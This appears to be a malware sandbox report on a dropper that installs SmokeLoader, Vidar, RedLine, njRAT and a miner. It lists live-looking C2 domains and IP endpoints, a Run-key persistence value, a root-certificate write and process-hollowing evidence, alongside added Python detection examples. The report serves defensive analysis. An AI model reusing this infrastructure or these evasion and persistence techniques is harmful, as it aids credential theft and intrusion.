Analysis

Max time kernel: 159s
Max time network: 161s
Platform: windows10_x64
Resource: win10-en
Submitted: 06-09-2021 22:08

Tasks:
  Static task static1
  Behavioral task behavioral1: sample 3a60e2f393e906944fc3f01e1e160a22.exe, resource win7v20210408
  Behavioral task behavioral2: sample 3a60e2f393e906944fc3f01e1e160a22.exe, resource win10-en

The signatures and process tree below are from behavioral2 (win10-en); the memory-dump resource names all carry the behavioral2/ prefix.

General

Target: 3a60e2f393e906944fc3f01e1e160a22.exe
Size: 201KB
MD5: 3a60e2f393e906944fc3f01e1e160a22
SHA1: 4350ffd3daf6c10d89c95b07bbfd67dbff452dc6
SHA256: abd8f8f1a74e9588e563fc30dfcff31218d5d87c84b13a3ad618bed7f1994171
SHA512: fc52c47bfc264eab3d7c63e6207911e522a2797b8d890f07d64b899d3cce02cf78a1ae8df09849240ccc0ac77dea9e2d4889eaaaf461ab1b052af3d2275b60f5
Malware Config

Extracted: smokeloader
  Version: 2020
  C2:
    http://fazanaharahe1.xyz/
    http://xandelissane2.xyz/
    http://ustiassosale3.xyz/
    http://cytheriata4.xyz/
    http://ggiergionard5.xyz/
    http://rrelleynaniy6.store/
    http://danniemusoa7.store/
    http://nastanizab8.store/
    http://onyokandis9.store/
    http://dmunaavank10.store/
    http://gilmandros11.site/
    http://cusanthana12.site/
    http://willietjeana13.site/
    http://ximusokall14.site/
    http://blodinetisha15.site/
    http://urydiahadyss16.club/
    http://glasamaddama17.club/
    http://marlingarly18.club/
    http://alluvianna19.club/
    http://xandirkaniel20.club/

Extracted: vidar
  Version: 40.4
  Botnet/profile: 1002
  C2: https://romkaxarit.tumblr.com/
  Attributes: profile_id = 1002

Extracted: redline
  Botnet: @Ebalosgory
  C2: 77.83.175.169:11490

Extracted: njrat
  C2: 62.33.159.162:5674
  Identifier (also used as reg_key): 26c50014115b430
  Attributes: reg_key = 26c50014115b430; splitter = @!#&^%$
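The four configs above mix indicator types (full URLs for SmokeLoader, a Tumblr profile URL that Vidar uses as a dead-drop, bare ip:port sockets for RedLine and njRAT). The following is an added example, not part of the sandbox report, that normalises them into exact hostnames and (ip, port) sockets and runs them over constructed DNS and firewall log lines. The log lines, the `query=`/`dst=` field names and the confidence labels are assumptions of this example; the indicators are copied from the config section.

```python
"""Normalise the C2 indicators extracted in this report and match them against
network log lines. Added example for this page, not part of the sandbox report;
the log lines below are constructed."""
import re
from urllib.parse import urlsplit

# Indicators copied from the Malware Config section of this report.
EXTRACTED = {
    "smokeloader": [
        "http://fazanaharahe1.xyz/", "http://xandelissane2.xyz/", "http://ustiassosale3.xyz/",
        "http://cytheriata4.xyz/", "http://ggiergionard5.xyz/", "http://rrelleynaniy6.store/",
        "http://danniemusoa7.store/", "http://nastanizab8.store/", "http://onyokandis9.store/",
        "http://dmunaavank10.store/", "http://gilmandros11.site/", "http://cusanthana12.site/",
        "http://willietjeana13.site/", "http://ximusokall14.site/", "http://blodinetisha15.site/",
        "http://urydiahadyss16.club/", "http://glasamaddama17.club/", "http://marlingarly18.club/",
        "http://alluvianna19.club/", "http://xandirkaniel20.club/",
    ],
    "vidar": ["https://romkaxarit.tumblr.com/"],
    "redline": ["77.83.175.169:11490"],
    "njrat": ["62.33.159.162:5674"],
}

def normalise(extracted):
    """Split URL indicators into exact hostnames and ip:port indicators into
    (ip, port) sockets, each mapped back to the family it was extracted from."""
    hosts, sockets = {}, {}
    for family, items in extracted.items():
        for item in items:
            if "://" in item:
                hosts[urlsplit(item).hostname.lower()] = family
            else:
                ip, port = item.rsplit(":", 1)
                sockets[(ip, int(port))] = family
    return hosts, sockets

HOSTS, SOCKETS = normalise(EXTRACTED)
IPS = {ip: family for (ip, _port), family in SOCKETS.items()}

# Assumed log field names for this example: "query=<host>" in DNS logs,
# "dst=<ip>:<port>" in firewall logs.
QUERY_RE = re.compile(r"\bquery=(?P<host>[\w.-]+)")
DST_RE = re.compile(r"\bdst=(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)")

def match_line(line):
    """Return (family, indicator, confidence) for a matching log line, else None.
    Hostnames are matched exactly: the Vidar indicator is one tumblr.com profile
    used as a dead-drop, so matching the registrable domain would flag every
    Tumblr user. Sockets are matched exactly first; a hit on the bare IP with a
    different port is reported with lower confidence."""
    m = QUERY_RE.search(line)
    if m:
        host = m.group("host").lower()
        if host in HOSTS:
            return (HOSTS[host], host, "exact")
        return None
    m = DST_RE.search(line)
    if m:
        ip, port = m.group("ip"), int(m.group("port"))
        if (ip, port) in SOCKETS:
            return (SOCKETS[(ip, port)], f"{ip}:{port}", "exact")
        if ip in IPS:
            return (IPS[ip], f"{ip}:{port}", "ip-only")
    return None

def scan(lines):
    """(timestamp, family, indicator, confidence) for every matching line."""
    hits = []
    for line in lines:
        hit = match_line(line)
        if hit:
            hits.append((line.split()[0], *hit))
    return hits

# Constructed DNS and firewall log lines; not taken from the report.
LOG_LINES = [
    "2021-09-06T22:09:01Z dns client=10.0.0.15 query=gilmandros11.site type=A",
    "2021-09-06T22:09:02Z dns client=10.0.0.15 query=romkaxarit.tumblr.com type=A",
    "2021-09-06T22:09:03Z dns client=10.0.0.15 query=www.tumblr.com type=A",
    "2021-09-06T22:09:05Z fw allow src=10.0.0.15:49812 dst=77.83.175.169:11490 proto=tcp",
    "2021-09-06T22:09:06Z fw allow src=10.0.0.15:49813 dst=62.33.159.162:5674 proto=tcp",
    "2021-09-06T22:09:07Z fw allow src=10.0.0.15:49814 dst=62.33.159.162:443 proto=tcp",
]

if __name__ == "__main__":
    for ts, family, ioc, conf in scan(LOG_LINES):
        print(f"{ts} {family:<12} {ioc} ({conf})")
```

The www.tumblr.com query deliberately does not match, and the 62.33.159.162:443 connection is reported as ip-only rather than dropped: njRAT's port is operator-configured, so the address is still worth a look even when the port differs.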
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
  resource                                      yara_rule
  C:\Users\Admin\AppData\Local\Temp\59BC.exe    disable_win_def
  C:\Users\Admin\AppData\Local\Temp\59BC.exe    disable_win_def
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
  resource                                                                         yara_rule
  behavioral2/memory/2880-159-0x0000000000400000-0x0000000000422000-memory.dmp     family_redline
  behavioral2/memory/2880-160-0x000000000041C5F6-mapping.dmp                       family_redline
Pid 2880 is the third F437.exe child; its parent F437.exe (pid 2040) wrote to it and called SetThreadContext on it (see the SetThreadContext and WriteProcessMemory tables below), so F437.exe is the RedLine loader hollowing a copy of itself.
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
  description              pid     process         target process
  PID 4076 created 2232    4076    WerFault.exe    lrWRoY.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
  resource                                                                         yara_rule
  behavioral2/memory/3044-123-0x0000000000400000-0x00000000021C1000-memory.dmp     family_vidar
Pid 3044 is 41BD.exe, the same process that WerFault.exe reports crashing 16 times below; the Vidar payload ran but was unstable in this environment.
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
Processes:
  pid     process
  3044    41BD.exe
  3636    9AAB.exe
  1876    EFC2.exe
  2040    F437.exe
  4044    F437.exe
  3512    F437.exe
  2880    F437.exe
  756     FB5C.exe
  2564    FED8.exe
  3636    Ajg9D2tcl.exe
  2232    lrWRoY.exe
  1580    Miner.exe
  1432    Miner.exe
  3640    Miner.exe
  4068    Miner.exe
  3980    Miner.exe
  1148    Miner.exe
  1584    56BD.exe
  2040    59BC.exe
Pids are reused within the run (3636 for both 9AAB.exe and Ajg9D2tcl.exe, 2040 for F437.exe and 59BC.exe, 3980 for a WerFault.exe and a Miner.exe, 3640 and 3512 and 1580 for cmd.exe/reg.exe and Miner.exe/F437.exe), so a pid alone does not identify a process in the tables that follow; read it together with the image name.
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description          ioc                                                               process
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion    9AAB.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion     9AAB.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion    FB5C.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion     FB5C.exe
Deletes itself 1 IoCs
Processes:
  pid     process
  3052    (image name not recorded in the report; this is the process that launches the dropped payloads, see the WriteProcessMemory table)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer (yara rule: themida) 6 IoCs
Processes:
  resource                                                               yara_rule
  C:\Users\Admin\AppData\Local\Temp\9AAB.exe                             themida
  C:\Users\Admin\AppData\Local\Temp\9AAB.exe                             themida
  behavioral2/memory/3636-128-0x00000000001D0000-0x00000000001D1000-memory.dmp    themida
  C:\Users\Admin\AppData\Local\Temp\FB5C.exe                             themida
  C:\Users\Admin\AppData\Local\Temp\FB5C.exe                             themida
  behavioral2/memory/756-180-0x00000000008C0000-0x00000000008C1000-memory.dmp     themida
The two Themida-packed droppers, 9AAB.exe and FB5C.exe, are also the only processes in this report that hide threads from the debugger and read the BIOS strings, which is the packer's own anti-analysis layer rather than the payload's.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 38 IoCs
Processes:
  description        ioc                                                                                                                           process    rows
  Key created        \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run                    reg.exe    18
  Set value (str)    \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe"    reg.exe    19
These two row shapes are the only ones that occur; every row is from one of the reg.exe instances spawned through the cmd.exe chains under Ajg9D2tcl.exe in the process tree (37 rows are present on this page against the 38 in the header).
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 2 IoCs
Processes:
  description          ioc                                                                                   process
  Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    9AAB.exe
  Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    FB5C.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
  pid     process
  3636    9AAB.exe
  756     FB5C.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
  description                          pid     process                                 target process
  PID 3792 set thread context of 1700  3792    3a60e2f393e906944fc3f01e1e160a22.exe    3a60e2f393e906944fc3f01e1e160a22.exe
  PID 2040 set thread context of 2880  2040    F437.exe                                F437.exe
  PID 2232 set thread context of 2196  2232    lrWRoY.exe                              RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour; nothing else in this report points that way (no encryption or ransom-note signatures fired), and drive enumeration is equally consistent with the file-grabbing stealers present here (Vidar, RedLine).
-
Program crash 17 IoCs
Processes:
  pid                                                                                            pid_target    process         target process
  3960, 4032, 3788, 1132, 2256, 2036, 3980, 184, 1632, 2268, 3304, 3972, 4052, 2248, 2532, 1356    3044          WerFault.exe    41BD.exe    (16 rows, one per WerFault pid)
  4076                                                                                           2232          WerFault.exe    lrWRoY.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description       ioc                                                 process
  Key opened        \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    3a60e2f393e906944fc3f01e1e160a22.exe
  Key queried       \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    3a60e2f393e906944fc3f01e1e160a22.exe
  Key enumerated    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    3a60e2f393e906944fc3f01e1e160a22.exe
Modifies system certificate store 2 IoCs
Processes:
  description         ioc                                                                                                                              process
  Key created         \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349           41BD.exe
  Set value (data)    \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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    41BD.exe
A certificate written under HKLM AuthRoot by a process in the user's Temp directory is worth checking on any host where this sample ran, by thumbprint D1EB23A46D17D68FD92564C2F1F1601764D8E349, since it would be trusted as a root for TLS and code signing.
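The registry rows in this report (BIOS and SCSI reads, the EnableLUA check, the Run-key writes, the AuthRoot certificate blob) all share one printed shape: an operation, a `\REGISTRY\...` path, an optional `= data`, and the process name. The following is an added example for this page, not part of the sandbox, that parses rows in that shape and applies the checks a reviewer would make on them: a Run value pointing into a user-writable AppData path, a write to a root certificate store, a UAC status read, and a per-process tally of sandbox-fingerprinting keys. The row grammar is inferred from the rows on this page, and the fingerprint key list and rule names are this example's own.

```python
"""Rule checks over registry rows in the format this report prints them.
Added example for this page, not part of the sandbox; the row grammar is
inferred from the rows on the page and the rule thresholds are my own."""
import re
from collections import defaultdict

# Rows copied from the report's registry tables. The 37 Run-key rows all have one
# of the two shapes included here; the certificate blob is the page's placeholder.
ROWS = r"""
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9AAB.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9AAB.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FB5C.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FB5C.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9AAB.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3a60e2f393e906944fc3f01e1e160a22.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3a60e2f393e906944fc3f01e1e160a22.exe
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 41BD.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = <blob> 41BD.exe
""".strip().splitlines()

# Row grammar as printed by the report: "<op> <path>[ = <data>] <process>".
ROW_RE = re.compile(
    r"^(?P<op>Key created|Key opened|Key queried|Key enumerated|Key value queried|"
    r"Set value \((?:str|data)\)) (?P<path>\\REGISTRY\\\S+)(?: = (?P<data>.+?))? (?P<proc>\S+)$"
)
RUN_VALUE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<name>[^\\]+)$", re.I)
ROOT_BLOB = re.compile(
    r"\\SystemCertificates\\(?P<store>AuthRoot|Root)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})\\Blob$")
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
# Registry locations commonly read to fingerprint a VM or sandbox (my own list,
# seeded from the keys this sample touches).
FINGERPRINT_KEYS = {
    r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion": "BIOS version string",
    r"\HARDWARE\DESCRIPTION\System\VideoBiosVersion": "video BIOS string",
    r"\SYSTEM\ControlSet001\Enum\SCSI": "SCSI device enumeration",
}
UAC_KEY = r"\Policies\System\EnableLUA"

def parse_row(line):
    """Split one printed row into op, path, data (None if absent) and process."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    if row["data"] and row["data"].startswith('"'):
        # REG_SZ data is printed quoted with doubled backslashes; undo both.
        row["data"] = row["data"].strip('"').replace("\\\\", "\\")
    return row

def evaluate(rows):
    """Apply the rules and return a list of {rule, process, detail} findings."""
    findings = []
    fingerprints = defaultdict(set)
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        op, path, proc, data = row["op"], row["path"], row["proc"], row["data"]
        low = path.lower()
        m = RUN_VALUE.search(path)
        if m and op.startswith("Set value") and data and USER_WRITABLE.search(data):
            findings.append({"rule": "run-key persistence from user-writable path",
                             "process": proc, "detail": f"{m.group('name')} -> {data}"})
        m = ROOT_BLOB.search(path)
        if m and op.startswith("Set value"):
            findings.append({"rule": "root certificate store modified", "process": proc,
                             "detail": f"{m.group('store')} {m.group('thumb').upper()}"})
        for suffix, what in FINGERPRINT_KEYS.items():
            if low.endswith(suffix.lower()):
                fingerprints[proc].add(what)
        if low.endswith(UAC_KEY.lower()):
            findings.append({"rule": "UAC status check", "process": proc, "detail": path})
    for proc, kinds in fingerprints.items():
        findings.append({"rule": "sandbox/VM fingerprinting", "process": proc,
                         "detail": ", ".join(sorted(kinds))})
    return findings

if __name__ == "__main__":
    for f in evaluate(ROWS):
        print(f"{f['rule']:<45} {f['process']:<40} {f['detail']}")
```

The persistence rule keys on the data, not the key: a Run value is normal, a Run value whose target lives under a user's AppData is what distinguishes this sample's WinAppHost entry. The fingerprint rule is a tally per process rather than a single hit, because one BIOS read is common in legitimate installers while two or three distinct probes from the same image is not.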
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid     process                                  rows
  1700    3a60e2f393e906944fc3f01e1e160a22.exe     2
  3052    (image name not recorded)                62
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid     process
  3052    (image name not recorded)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
  pid     process
  1700    3a60e2f393e906944fc3f01e1e160a22.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  pid                                                                                      process                       privileges enabled
  3960                                                                                     WerFault.exe                  SeRestorePrivilege, SeBackupPrivilege, SeDebugPrivilege
  3788, 1132, 2256, 2036, 3980, 184, 1632, 2268, 3304, 3972, 4052, 2248, 2532, 1356, 4076    WerFault.exe                  SeDebugPrivilege (one row each)
  3052                                                                                     (image name not recorded)     SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating, 20 rows each
  3636                                                                                     9AAB.exe                      SeDebugPrivilege
  2040                                                                                     F437.exe                      SeDebugPrivilege
  2564                                                                                     FED8.exe                      SeDebugPrivilege
  2880                                                                                     F437.exe                      SeDebugPrivilege
  756                                                                                      FB5C.exe                      SeDebugPrivilege
  1580                                                                                     Miner.exe                     SeDebugPrivilege
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
  pid     process
  1876    EFC2.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
  pid     process
  3052    (image name not recorded)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  source pid    source process                          target pid    target process                          rows
  3792          3a60e2f393e906944fc3f01e1e160a22.exe    1700          3a60e2f393e906944fc3f01e1e160a22.exe    6
  3052          (image name not recorded)               3044          41BD.exe                                3
  3052          (image name not recorded)               3636          9AAB.exe                                3
  3052          (image name not recorded)               1876          EFC2.exe                                3
  3052          (image name not recorded)               2040          F437.exe                                3
  2040          F437.exe                                4044          F437.exe                                3
  2040          F437.exe                                3512          F437.exe                                3
  2040          F437.exe                                2880          F437.exe                                8
  3052          (image name not recorded)               756           FB5C.exe                                3
  3052          (image name not recorded)               2564          FED8.exe                                3
  2564          FED8.exe                                3636          Ajg9D2tcl.exe                           3
  2564          FED8.exe                                2232          lrWRoY.exe                              3
  3636          Ajg9D2tcl.exe                           4036          cmd.exe                                 3
  4036          cmd.exe                                 3640          cmd.exe                                 3
  4036          cmd.exe                                 3512          reg.exe                                 3
  3640          cmd.exe                                 2040          cmd.exe                                 3
  3636          Ajg9D2tcl.exe                           908           cmd.exe                                 3
  908           cmd.exe                                 3064          cmd.exe                                 3
  908           cmd.exe                                 1580          reg.exe                                 2 (table capped at 64 rows)
The uniform three-row groups occur for every parent/child pair on the page, including cmd.exe spawning reg.exe, so they are the writes that accompany ordinary process creation rather than injection. The pairs that stand out are 3792 -> 1700 (6 rows) and 2040 -> 2880 (8 rows), both a parent writing into a freshly started copy of its own image, and both also appear in the SetThreadContext table: that combination is process hollowing.
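The SetThreadContext and WriteProcessMemory tables above are printed as "PID <src> <operation> <dst> <src> [<source image>] <target image>" rows, and the hollowing cases only become obvious when the two tables are joined on the (source, target) pair. The following is an added example for this page, not part of the sandbox, that parses rows in that shape, joins them, and labels each SetThreadContext pair by what the image names say about it. The row grammar (in particular that a lone trailing image name is the target when the source process has no recorded name, as for pid 3052) is inferred from the rows on this page; the list of commonly hollowed system binaries is this example's own.

```python
"""Join the report's SetThreadContext and WriteProcessMemory rows into
process-injection candidates. Added example for this page, not part of the
sandbox; the rows are a subset copied from the tables above."""
import re
from collections import Counter

# A subset of the rows printed in this report's two tables.
ROWS = """
PID 3792 set thread context of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe
PID 2040 set thread context of 2880 2040 F437.exe F437.exe
PID 2232 set thread context of 2196 2232 lrWRoY.exe RegSvcs.exe
PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe
PID 3052 wrote to memory of 3044 3052 41BD.exe
PID 2040 wrote to memory of 4044 2040 F437.exe F437.exe
PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe
PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe
PID 2564 wrote to memory of 2232 2564 FED8.exe lrWRoY.exe
PID 4036 wrote to memory of 3512 4036 cmd.exe reg.exe
""".strip().splitlines()

# Row grammar as printed: the source pid is repeated after the target pid,
# then up to two image names follow.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>set thread context of|wrote to memory of) "
    r"(?P<dst>\d+) (?P=src)(?: (?P<img1>\S+))?(?: (?P<img2>\S+))?$"
)

# Assumed: system binaries that loaders commonly start suspended and hollow.
SYSTEM_HOSTS = {"regsvcs.exe", "regasm.exe", "svchost.exe", "explorer.exe"}

def parse_row(line):
    """Return {src, dst, op, src_img, dst_img}; a single trailing image name is
    the target's (the source, e.g. pid 3052 here, has no recorded name)."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    src_img, dst_img = m.group("img1"), m.group("img2")
    if dst_img is None:
        src_img, dst_img = None, src_img
    return {"src": int(m.group("src")), "dst": int(m.group("dst")),
            "op": "ctx" if m.group("op").startswith("set") else "write",
            "src_img": src_img, "dst_img": dst_img}

def injection_candidates(rows):
    """SetThreadContext on another process anchors a candidate; the number of
    WriteProcessMemory rows against the same target is attached as supporting
    evidence, and the image pair decides the label."""
    writes = Counter()
    ctx = {}
    for line in rows:
        r = parse_row(line)
        if r is None:
            continue
        key = (r["src"], r["dst"])
        if r["op"] == "write":
            writes[key] += 1
        else:
            ctx[key] = (r["src_img"], r["dst_img"])
    out = {}
    for key, (src_img, dst_img) in ctx.items():
        if src_img and dst_img and src_img.lower() == dst_img.lower():
            kind = "self-hollowing (child is a copy of the parent)"
        elif dst_img and dst_img.lower() in SYSTEM_HOSTS:
            kind = f"hollowed system binary ({dst_img})"
        else:
            kind = "injection into unrelated process"
        out[key] = {"src_img": src_img, "dst_img": dst_img,
                    "writes": writes[key], "kind": kind}
    return out

if __name__ == "__main__":
    for (src, dst), info in sorted(injection_candidates(ROWS).items()):
        print(f"{src} -> {dst}: {info['kind']}, {info['writes']} write rows")
```

Note the 2232 -> 2196 pair (lrWRoY.exe into RegSvcs.exe) has no WriteProcessMemory rows on this page at all, because that table is capped at 64 rows and stops at the cmd.exe/reg.exe chains; the join must therefore treat SetThreadContext as sufficient on its own and use the write count only to raise confidence, never to filter.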
Processes

Entries are indented by the depth the report assigns them ([1] is a top-level process); each shows the image path and then the command line as recorded.

  [1] C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        (pid 1700, the hollowed copy of the sample per the SetThreadContext table; the SmokeLoader stage runs here)
  [1] C:\Users\Admin\AppData\Local\Temp\41BD.exe
      command line: C:\Users\Admin\AppData\Local\Temp\41BD.exe
      - Executes dropped EXE
      - Modifies system certificate store
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 756
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 808
        - Program crash
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 740
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 820
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 952
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 976
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1392
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1352
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1656
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1572
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1664
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1748
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1720
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1352
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1640
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1796
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
  [1] C:\Users\Admin\AppData\Local\Temp\9AAB.exe
      command line: C:\Users\Admin\AppData\Local\Temp\9AAB.exe
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of AdjustPrivilegeToken
  [1] C:\Users\Admin\AppData\Local\Temp\EFC2.exe
      command line: C:\Users\Admin\AppData\Local\Temp\EFC2.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  [1] C:\Users\Admin\AppData\Local\Temp\F437.exe
      command line: C:\Users\Admin\AppData\Local\Temp\F437.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\F437.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        - Executes dropped EXE
    [2] C:\Users\Admin\AppData\Local\Temp\F437.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        - Executes dropped EXE
    [2] C:\Users\Admin\AppData\Local\Temp\F437.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        (pid 2880 per the SetThreadContext and AdjustPrivilegeToken tables; the RedLine payload was found in this process's memory)
      [3] C:\Users\Admin\AppData\Local\Temp\Miner.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
        [4] C:\Users\Admin\AppData\Local\Temp\Miner.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            - Executes dropped EXE
        [4] C:\Users\Admin\AppData\Local\Temp\Miner.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            - Executes dropped EXE
        [4] C:\Users\Admin\AppData\Local\Temp\Miner.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            - Executes dropped EXE
